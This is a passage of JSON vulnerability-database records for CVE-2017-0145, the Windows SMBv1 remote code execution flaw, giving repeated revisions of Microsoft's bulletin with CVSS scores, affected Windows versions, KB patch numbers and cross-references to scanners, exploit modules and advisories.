Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-25T23:09:38", "differentElements": ["msAffectedSoftware"], "edition": 76}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-26T00:46:05", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-26T00:46:05", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-26T00:46:05", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KBMS16-110, 3187754", "KB3210720", "KB4012217", "KB3177186", "KB3213986", "KB4012216", "KB3205409", "KB4012213", "KB4012214", "KB3205401", "KB4012212", "KB4014077", "KB4012606", "KB4012598", "KB3210721", "KB4012215", "KB3212646", "KB4013198"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-26T00:46:05", "differentElements": ["msAffectedSoftware"], "edition": 77}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-28T08:53:53", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-28T08:53:53", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-28T08:53:53", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3210720", "KBMS16-110, 3187754", "KB4012215", "KB4012212", "KB4012216", "KB3212646", "KB3205409", "KB3213986", "KB3177186", "KB4012598", "KB4012217", "KB4012606", "KB3210721", "KB4012214", "KB4013198", "KB4012213", "KB3205401", "KB4014077", "KB4013429"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": 